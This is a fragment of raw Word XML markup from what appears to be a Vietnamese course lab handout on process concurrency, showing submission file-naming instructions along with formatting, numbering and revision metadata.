        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đặt tên theo định dạng: [Mã lớp]-ExeX_GroupY. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>trong</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> đó X là Thứ tự Bài tập, Y là mã số thứ tự nhóm trong danh sách mà GV phụ trách công bố). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E8572E" w14:textId="77777777" w:rsidR="00F54C0C" w:rsidRPr="00C91CBE" w:rsidRDefault="00F54C0C" w:rsidP="00F54C0C">
      <w:pPr>
        <w:pStyle w:val="NoiDung"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91CBE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009613E4">
        <w:t>NT101.K</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009613E4">
        <w:t>11.ANTT</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>]-Exe0</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91CBE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>1_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Group03.</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6A0A82DD" w14:textId="77777777" w:rsidR="00F54C0C" w:rsidRPr="004657A2" w:rsidRDefault="00F54C0C" w:rsidP="00F54C0C">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 bài </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>nộp</w:t>
      </w:r>
      <w:r w:rsidRPr="004657A2">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.</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F54C0C">
      <w:pPr>
        <w:pStyle w:val="NoiDung"/>
        <w:ind w:firstLine="360"/>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696078">
      <w:headerReference w:type="default" r:id="rId18"/>
      <w:footerReference w:type="default" r:id="rId19"/>
      <w:headerReference w:type="first" r:id="rId2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2CED6" w14:textId="77777777" w:rsidR="00FB5315" w:rsidRDefault="00FB5315" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3299DD13" w14:textId="77777777" w:rsidR="00FB5315" w:rsidRDefault="00FB5315"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0F6379">
                            <w:rPr>
                              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>môn</w:t>
                          </w:r>
                          <w:proofErr w:type="gramEnd"/>
                          <w:r w:rsidR="000F6379">
                            <w:rPr>
                              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t xml:space="preserve"> học</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="49EC7BA0" w14:textId="224023B3"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21</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00736266">
                            <w:rPr>
                              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>-20</w:t>
                          </w:r>
                          <w:r w:rsidR="00F13188">
                            <w:rPr>
                              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                              <w:sz w:val="20"/>
                              <w:lang w:val="vi-VN"/>
                            </w:rPr>
                            <w:t>2</w:t>
                          </w:r>
                          <w:r w:rsidR="000F6379">
                            <w:rPr>
                              <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                              <w:sz w:val="20"/>
                            </w:rPr>
                            <w:t>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0F6379">
                      <w:rPr>
                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>môn</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r w:rsidR="000F6379">
                      <w:rPr>
                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> học</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="49EC7BA0" w14:textId="224023B3"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21</w:t>
                    </w:r>
                    <w:r w:rsidRPr="00736266">
                      <w:rPr>
                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>-20</w:t>
                    </w:r>
                    <w:r w:rsidR="00F13188">
                      <w:rPr>
                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                        <w:sz w:val="20"/>
                        <w:lang w:val="vi-VN"/>
                      </w:rPr>
                      <w:t>2</w:t>
                    </w:r>
                    <w:r w:rsidR="000F6379">
                      <w:rPr>
                        <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>2</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6C6DA" w14:textId="77777777" w:rsidR="00FB5315" w:rsidRDefault="00FB5315" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2C4EE77C" w14:textId="77777777" w:rsidR="00FB5315" w:rsidRDefault="00FB5315"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210D0156"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4D33FE">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>3: Song trùng tiến trình</w:t>
    </w:r>
    <w:r w:rsidR="00162043">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidR="00EF174D">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t>Ex</w:t>
    </w:r>
    <w:r w:rsidR="00162043">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> 0</w:t>
    </w:r>
    <w:r w:rsidR="004D33FE">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>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560386"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="167CE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D3C8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="191A3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A2306"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9346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20C7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4080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587A68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8084D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6643231">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1107390038">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1839495151">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1757751016">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="711809823">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="399132062">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="812067998">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2117823913">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="45378370">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="390079216">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="726221089">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1427531539">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1750692002">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1289319806">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="644744656">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="207957814">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1160390560">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="641277596">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="541097871">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="744760190">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="121335032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23E4"/>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395"/>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9609D"/>
    <w:rsid w:val="000A2058"/>
    <w:rsid w:val="000A2669"/>
    <w:rsid w:val="000A26C8"/>
    <w:rsid w:val="000A300B"/>
    <w:rsid w:val="000A35AF"/>
    <w:rsid w:val="000A45A2"/>
    <w:rsid w:val="000A4CB8"/>
    <w:rsid w:val="000A5FD4"/>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379"/>
    <w:rsid w:val="000F674A"/>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5675"/>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06669"/>
    <w:rsid w:val="00210175"/>
    <w:rsid w:val="00211BB4"/>
    <w:rsid w:val="0021379F"/>
    <w:rsid w:val="002174B9"/>
    <w:rsid w:val="00220519"/>
    <w:rsid w:val="00222BE2"/>
    <w:rsid w:val="00224153"/>
    <w:rsid w:val="0022596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575C9"/>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0256"/>
    <w:rsid w:val="0029252D"/>
    <w:rsid w:val="002937A5"/>
    <w:rsid w:val="0029459C"/>
    <w:rsid w:val="00295E81"/>
    <w:rsid w:val="00295F41"/>
    <w:rsid w:val="00295FDE"/>
    <w:rsid w:val="00296052"/>
    <w:rsid w:val="002967BC"/>
    <w:rsid w:val="002A0065"/>
    <w:rsid w:val="002A096F"/>
    <w:rsid w:val="002A3991"/>
    <w:rsid w:val="002A74EA"/>
    <w:rsid w:val="002B465C"/>
    <w:rsid w:val="002B473D"/>
    <w:rsid w:val="002B4D33"/>
    <w:rsid w:val="002B5D48"/>
    <w:rsid w:val="002B65A7"/>
    <w:rsid w:val="002B7252"/>
    <w:rsid w:val="002C037D"/>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5E71"/>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571E"/>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4CD"/>
    <w:rsid w:val="00456BE3"/>
    <w:rsid w:val="00464CFB"/>
    <w:rsid w:val="004657A2"/>
    <w:rsid w:val="004669A1"/>
    <w:rsid w:val="00466CD0"/>
    <w:rsid w:val="00470688"/>
    <w:rsid w:val="004760AA"/>
    <w:rsid w:val="00476BC6"/>
    <w:rsid w:val="00480745"/>
    <w:rsid w:val="00480A32"/>
    <w:rsid w:val="00484AFA"/>
    <w:rsid w:val="00486903"/>
    <w:rsid w:val="00486B12"/>
    <w:rsid w:val="00490B0D"/>
    <w:rsid w:val="00491B22"/>
    <w:rsid w:val="00493CA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33FE"/>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6A30"/>
    <w:rsid w:val="005171F1"/>
    <w:rsid w:val="0052075B"/>
    <w:rsid w:val="0052292D"/>
    <w:rsid w:val="00524081"/>
    <w:rsid w:val="0052587B"/>
    <w:rsid w:val="0053014B"/>
    <w:rsid w:val="00532A9C"/>
    <w:rsid w:val="00532DC8"/>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A7EA5"/>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1F0"/>
    <w:rsid w:val="005D63E9"/>
    <w:rsid w:val="005E02D1"/>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3D86"/>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B7F19"/>
    <w:rsid w:val="006C35C1"/>
    <w:rsid w:val="006C3DF2"/>
    <w:rsid w:val="006C689D"/>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B47"/>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3A04"/>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256"/>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66569"/>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5A3"/>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4F17"/>
    <w:rsid w:val="00BC59C7"/>
    <w:rsid w:val="00BC6A17"/>
    <w:rsid w:val="00BD13B5"/>
    <w:rsid w:val="00BD1842"/>
    <w:rsid w:val="00BD1BEE"/>
    <w:rsid w:val="00BD1E7E"/>
    <w:rsid w:val="00BD245C"/>
    <w:rsid w:val="00BD31BA"/>
    <w:rsid w:val="00BD39B9"/>
    <w:rsid w:val="00BD39E8"/>
    <w:rsid w:val="00BD3DC7"/>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86AF9"/>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35"/>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493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B5315"/>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D8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51778768">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="61102893">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1939630614">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="15723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15093607">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60420680">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5083057">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1569684211">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="766846243">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1060058357">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="966010499">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2042245378">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="631785167">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="447044461">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2051686219">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="678115801">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1244922677">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="314071984">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="218171813">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="7677855">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="359863921">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2020963645">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1602569648">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="157235299">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1001587051">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1854608819">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="14502587">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="357195447">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1158690404">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1023364396">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="842161059">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="225916902">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="455098967">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="513227862">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1336953890">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1191913515">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="252010046">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="204685438">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
